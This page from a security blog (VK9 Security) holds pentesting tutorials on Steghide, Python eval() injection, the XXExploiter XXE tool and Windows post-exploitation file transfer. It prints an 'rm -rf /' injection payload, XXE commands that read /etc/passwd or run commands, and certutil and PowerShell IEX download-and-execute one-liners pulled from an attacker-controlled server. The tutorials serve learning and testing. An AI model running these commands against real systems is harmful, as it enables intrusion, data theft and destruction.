VK9 Security

Steganography with Steghide

by | Jun 30, 2023 | Steganography, Uncategorised

Steghide is a popular command-line tool used for hiding and extracting sensitive information within various file formats using steganography techniques. Steganography is the practice of concealing one piece of information within another.

Installing Steghide

Before you can use Steghide, you need to install it on your system. Here are the general steps:

  • Linux: Use your distribution's package manager (e.g., apt, yum) to install Steghide. For example, on Ubuntu, you can run sudo apt-get install steghide
  • macOS: You can use package managers like Homebrew or MacPorts to install Steghide. For Homebrew, run brew install steghide
  • Windows: Download the Steghide binary from the official website (https://steghide.sourceforge.io/) and follow the installation instructions.

How use

Hiding a Text File within an Image:

Let's assume you have a text file called "secret.txt" and an image file called "cover.jpg" in the same directory. Follow these steps to hide the text file within the image:

Open your terminal or command prompt and navigate to the directory where the files are located.

Use the following command to embed the text file within the image:

  • steghide embed -cf cover.jpg -ef secret.txt
  • <Passphrase>: 123456

This command tells Steghide to embed the "secret.txt" file within the "cover.jpg" image file.

Steghide will prompt you to enter a passphrase. Choose a strong passphrase and remember it, as you'll need it later to extract the hidden file.

After providing the passphrase, Steghide will generate a new file called "cover.jpg" (or the same name as the original file) with the embedded data.

Extracting a Hidden File from an Image:

Now, let's extract the hidden file from the image we created in the previous step. Follow these instructions:

Open your terminal or command prompt and navigate to the directory where the image file is located.

Use the following command to extract the hidden file:

  • steghide extract -sf cover.jpg
  • <Passphrase>: 123456

This command instructs Steghide to extract any hidden data from the "cover.jpg" image file.

Steghide will prompt you to enter the passphrase you used during the embedding process. Enter the correct passphrase.

Steghide will then extract the hidden file and save it in the current directory with its original name.

Hiding a File with Encryption:

In this example, we'll hide a file within an image, but we'll encrypt the file before embedding it. Follow these steps:

Encrypt the file you want to hide using your preferred encryption tool. Let's assume the encrypted file is called "secret.enc".

Open your terminal or command prompt and navigate to the directory where the files are located.

Use the following command to hide the encrypted file within the image:

  • steghide embed -cf cover.jpg -ef secret.enc -p <passphrase>

Replace <passphrase> with the passphrase you want to use for embedding the file.

Steghide will embed the encrypted file within the image using the provided passphrase.

Specifying an Output File:

By default, Steghide will overwrite the original file when embedding or extracting data. However, you can specify a different output file using the "-sf" (source file) and "-xf" (extract file) options.

To specify an output file during embedding, use the "-sf" option followed by the desired output file name. For example:

  • steghide embed -cf cover.jpg -ef secret.txt -sf output.jpg

 

Exploiting Python EVAL() Code Injection

by | Jun 28, 2023 | Uncategorised

Python is a versatile and powerful programming language known for its simplicity and readability. One of the features that makes Python flexible is the eval() function, which allows the execution of dynamically generated code. While eval() can be a useful tool in certain situations, it also carries inherent security risks if used improperly. In this article, we will delve into the dangers of Python EVAL code injection and how it can be exploited by malicious actors.

Understanding EVAL and Code Injection:

The eval() function in Python evaluates a string as a Python expression and returns the result. It allows developers to dynamically execute code during runtime, providing great flexibility. However, if user-supplied input is directly passed into eval(), it can lead to code injection vulnerabilities.

Code injection occurs when an attacker manages to insert malicious code into a program, exploiting a vulnerability in the system. In the case of Python EVAL code injection, an attacker manipulates input data to execute unintended commands, potentially compromising the security and integrity of the system.

Exploiting EVAL Code Injection:

Exploiting EVAL code injection involves crafting input that can be executed by eval() in an unintended manner. Here's an example:

In this code snippet, the user is prompted to enter a number, which is then concatenated with a string to form an expression that is passed to eval().

If an attacker enters malicious input like "__import__('os').system('rm -rf /')" instead of a valid number, the eval() function will execute the unintended command, resulting in the deletion of files on the system.

Example

1. So, by running this function normally, the eval() will add 2 + the user provided input.

  • python3 eval_test.py
  • 4

2. Abusing this eval function we can inject code, in this case

  • python3 eval_test.py
  • __import__('os').system('date')

3. You can then exploit further to get a reverse shell, escalate privileges, or read/write important files

Bypass examples

Most of the time, we need to bypass another expression to execute our desired command.

Mitigating the Risks:

To protect against EVAL code injection, it is crucial to follow best practices for input validation and sanitization. Here are some recommended measures:

  • Input Validation: Always validate user input to ensure it conforms to expected formats and ranges. Use appropriate validation techniques like regular expressions or type checking to filter out potentially harmful input.
  • Avoid Direct EVAL: Whenever possible, avoid using eval() to evaluate user input. Consider alternative approaches that don't involve executing arbitrary code, such as using ast.literal_eval() to safely evaluate literals.
  • Context-Specific Evaluation: If you must use eval(), restrict the evaluation to a specific context by creating a whitelist of allowed functions, modules, or operations. This approach limits the potential damage an attacker can inflict.
  • Use Secure Defaults: Configure your system and applications with secure defaults, such as running with limited privileges or using a restricted execution environment. This reduces the impact of code injection vulnerabilities.
  • Regularly Update Dependencies: Keep your Python interpreter and libraries up to date to benefit from security patches and fixes. Many vulnerabilities related to EVAL code injection are often addressed in newer versions.

Sources

https://semgrep.dev/docs/cheat-sheets/python-code-injection/

https://www.stackhawk.com/blog/command-injection-python/

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-eval-code-execution/

https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1

https://sethsec.blogspot.com/2016/11/exploiting-python-code-injection-in-web.html

 

[How to] XXExploit Guide

by | Jun 25, 2023 | Uncategorised

It generates the XML payloads, and automatically starts a server to serve the needed DTD's or to do data exfiltration.

Installation

1. To install XXExploit, you first need to install npm module. npm stands for "Node Package Manager." It is a package manager for JavaScript that allows developers to easily install and manage dependencies for their Node.js projects.

  • sudo apt install nodejs
  • sudo apt install npm

2. Install the XXExploiter module using npm

  • sudo npm install -g xxexploiter

3. Run the tool

  • xxexploiter

Building and Running from source

1. This is a simple Node application written with typescript. So you can build it as you build other apps:

(install node and npm first, if you dont have them)

  • npm install
  • npm run build

Note: you may need to npm install tsc -g in order for 'npm build' to succeed

2. To run the app you can do it with one of two ways:

  • npm start [args]
  • node dist/index.js [args]

Or you can install it on your system:

  • npm link

How to

1. There are basically 4 main commands:

  • file – to read local files
  • request – do SSRF attack, to make requests from the target machine
  • expect – Use PHP expect to execute commands, if your target is a PHP app
  • XEE – Just do parameter expansions to try to cause a DOS.

2. File: We will create a default payload to read a common file /etc/passwd

  • xxexploiter file /etc/passwd

3. Request: We will make a request from the target machine to a website

  • xxexploiter request http://127.0.0.1:8080

3. Expect: Creates a default payload to execute system commands

  • xxexploiter expect id

Using other options

Template:

-t, --template : path to an XML template where to inject payload

  • xxexploiter file /etc/passwd --template exploit.xml

Write an output file

-x : Use a request to automatically send the xml file

  • xxexploiter file /etc/passwd --template exploit.xml -o payload.xml
  • cat payload

Mode

-m, --mode : Extraction Mode: xml, oob, cdata. Default: xml

-s, --server : Server address for OOB and DTD

-p, --port : Server port for OOB and DTDs. Default: 7777

If you choose to use OOB or CDATA mode, XXExploiter will generate the necessary dtd to be included, and will start a server to host them.

  • xxexploiter -s 127.0.0.1 file /c/windows/win.ini -t exploit.xml -m oob

Encoding

-e, --encode : Extraction Encoding: none, phpbase64. Default: none

  • xxexploiter file /etc/passwd --template exploit.xml -e phpbase64

Sources

https://kalilinuxtutorials.com/xxexploiter/

https://hakin9.org/xxexploiter-tool-to-help-exploit-xxe-vulnerabilities/

https://github.com/luisfontes19/xxexploiter

 

Download files using windows (HTTP, FTP, SMB)

by | Jan 5, 2022 | Uncategorised

Part of penetration testing (post-exploitation) requires you to transfer files from your machine to the target machine. Here are some commands we can use to download files in windows.

HTTP

1. Set up a Web Server

  • python3 -m http.server 8888
  • python2.7 -m SimpleHTTPServer 8888

2. We will transfer a file named VK9-Sec.jpg

CertUtil

1. In CMD you can run to download files

  • certutil -urlcache -split -f "http://ip-addr:port/file" [output-file]
  • certutil -urlcache -split -f "http://192.168.0.13:8888/VK9-Sec.jpg" VK9-Sec.jpg
  • dir VK9-Sec.jpg

PowerShell (IWR)

  • IWR http://192.168.0.13:8888/VK9-Sec.jpg -OutFile VK9-Sec.jpg
  • dir VK9-Sec.jpg

2. It can also be run from CMD

  • powershell.exe IWR http://192.168.0.13:8888/VK9-Sec.jpg -OutFile VK9-Sec.jpg
  • dir VK9-Sec.jpg

Powershell (Invoke-WebRequest)

  • Invoke-WebRequest -URI 'http://192.168.0.13:8888/VK9-Sec.jpg ' -Outfile .\VK9-Sec.jpg
  • dir VK9-Sec.jpg

2. This can also be run from CMD

  • powershell.exe Invoke-WebRequest -URI 'http://192.168.0.13:8888/VK9-Sec.jpg' -Outfile .\VK9-Sec.jpg
  • dir VK9-Sec.jpg

Fileless download

We can download and execute from memory using Powershell.

1. First we will set up a web server containing Sherlock.ps1 to execute as a test

  • git clone https://github.com/rasta-mouse/Sherlock.git
  • cd Sherlock
  • python3.9 -m http.server 9999

2. In the remote machine you have to execute

Powershell

  • powershell -ep bypass
  • IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.16:8888/Sherlock.ps1');Find-AllVulns

CMD

  • powershell.exe "iex(new-object net.webclient).downloadString(‘http://192.168.0.16:8888/Sherlock.ps1’);Find-AllVulns"

FTP

Pyftpdlib Python library

FTP is another common method of file transfer, and FTP clients are usually installed by default on Windows machines.

1. Install in your local linux server the python library for setting up the FTP server, (you can run it without sudo as well)

  • sudo pip3 install pyftpdlib
  • sudo python3 -m pyftpdlib -p 21

2. From the remote Windows machine we can connect using FTP.

  • Open 192.168.0.16
  • User: anonymous
  • Password: anonymous

3. As we logged in successfully, we can run FTP commands to inspect the files in the directories and download it into our machine

  • HELP
  • dir
  • GET VK9-Sec.jpg

Note as you can see the transfer completed. If we actually check our directory, we will see the file downloaded

  • dir

SMB

We can also use the SMB protocol to transfer files.

1. Start a SMB server in Kali

  • impacket-smbserver EVILSHARE ~/Desktop -smb2support

2. From the remote machine connect to the SMB server we just set up, we can see our share “EVILSHARE”

  • net view \\192.168.0.13

3. List the files in the share

  • dir \\192.168.0.13\EVILSHARE

3. Download into the remote server

  • copy \\192.168.0.13\EVILSHARE\VK9-Sec.jpg